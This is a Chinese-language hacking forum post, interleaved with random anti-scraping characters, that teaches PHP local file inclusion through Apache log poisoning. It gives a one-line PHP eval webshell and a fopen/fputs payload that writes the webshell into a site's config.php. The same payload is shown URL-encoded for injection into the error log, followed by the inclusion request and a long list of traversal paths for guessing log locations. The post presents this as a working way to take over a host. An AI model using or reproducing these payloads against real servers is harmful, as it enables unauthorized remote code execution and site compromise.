php包含apache日志写马

admin

因为上面那个很不实际，我在测试中发现日志动不动就是几十兆，那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用，也比上面那种慢的要死好很多。
, b% }: o2 }/ @2 p
, H$ G0 _! l9 }9 p比如还是这句一句话木马
<?eval($_POST[cmd]);?>   

  W2 R/ ?; C# Q: T/ S9 j8 Q. N! @- k到这里你也许就想到了，这是个很不错的办法。接着看,如何写入就成了个问题，用这句，
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件，然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
' w/ U- Y: c( o* L- a: B/ X0 t
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?>   //在config.php里写入一句木马语句

; W1 B8 C3 ?1 b我们提交这句，再让Apache记录到错误日志里，再包含就成功写入shell,记得一定要转换成URL格式才成功。
转换为
% x4 [7 p6 t- n: g  n( c* N$ z0 {1 F& j%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
% H8 Q" @  C! _config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
9 L  y  r0 y% _我们提交
: u: c1 t; q; R2 J( Nhttp://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
9 A$ G& {; w4 e6 S( w/ Y$ k, ^%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
, p) c& Y( h7 Q( E' Acmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

这样就错误日志里就记录下了这行写入webshell的代码。
我们再来包含日志，提交
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
* w& b& k8 r" J  \" Y
1 f7 d- E: R4 k) T6 I# ?& D8 S这样webshell就写入成功了，config.php里就写入一句木马语句
OK.
) S6 U" X8 n3 s; @' M: x/ D' Vhttp://www.xxx.com/forum/config.php这个就成了我们的webshell
+ [% J- Y( q  _2 E  ]* n. \直接用lanker的客户端一连，主机就是你的了。

# v$ [2 P) X, C! |! N! YPS:上面讲的，前提是文件夹权限必须可写 ，一定要-rwxrwxrwx(777)才能继续，这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用

( m' \2 a* g2 O! M( ?% x7 l; T其他的日志路径，你可以去猜，也可以参照这里。
../../../../../../../../../../var/log/httpd/access_log
& \* ]/ C1 O) m/ \( V- b../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
3 S- X0 q; r( A& L../apache/logs/access.log
% \1 @# B/ Q' a. u. q/ o../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
: o/ a: r% M! e" C../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
7 o5 }! F, [4 E* F2 q../../../../../../../../../../etc/httpd/logs/error.log
1 t% U% }) r( r! I. f- N../../../../../../../../../../var/www/logs/access_log
. k7 A' o9 ^) m6 M9 o6 r# V3 p../../../../../../../../../../var/www/logs/access.log
* n6 z  }/ M" Y) B% h. Y7 |3 J../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
. H! w4 }, g3 l& E& W, j6 F../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
6 c( [2 ~4 W& M4 {& J) I  \9 f# \../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
3 o; s5 M$ l- G7 m5 J) o' J../../../../../../../../../../var/log/apache/error_log
. |2 i$ F, w& j1 f+ c  R' X3 C../../../../../../../../../../var/log/apache/error.log
9 h  N( Y' h  c7 Z4 t, l6 p../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log      
+ ]1 ~- |9 ]6 Q* L$ P* i9 a& X* S3 B/var/log/httpd/error_log     
../apache/logs/error.log     
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
3 |+ G0 D6 H1 ^/ f../../../apache/logs/access.log
/etc/httpd/logs/acces_log
( R& _% a+ u8 @% q9 ?7 Z  O/etc/httpd/logs/acces.log
% I. Q+ m- i9 e$ Q% J' Q) z/etc/httpd/logs/error_log
* v$ h, B8 P8 i  z3 t/etc/httpd/logs/error.log
# }7 M: U+ O+ p6 a1 |+ c/var/www/logs/access_log
/var/www/logs/access.log
; J% U& |& N  _- j' O, S8 z/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
9 Q: w. R0 z9 J/ N/ v/var/log/apache/access_log
/var/log/apache/access.log
4 Y( W, E/ W; K. }# k/var/log/access_log
3 h, N+ Y! m! P- r/var/www/logs/error_log
/ B3 f+ C: P6 s. J  w/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
* z# K9 `: F) m: y8 W/var/log/apache/error_log
/var/log/apache/error.log
' C7 Y1 x# G/ T- ^2 y/var/log/access_log
) J0 ~; S  k% {9 y; ~7 Y, k/var/log/error_log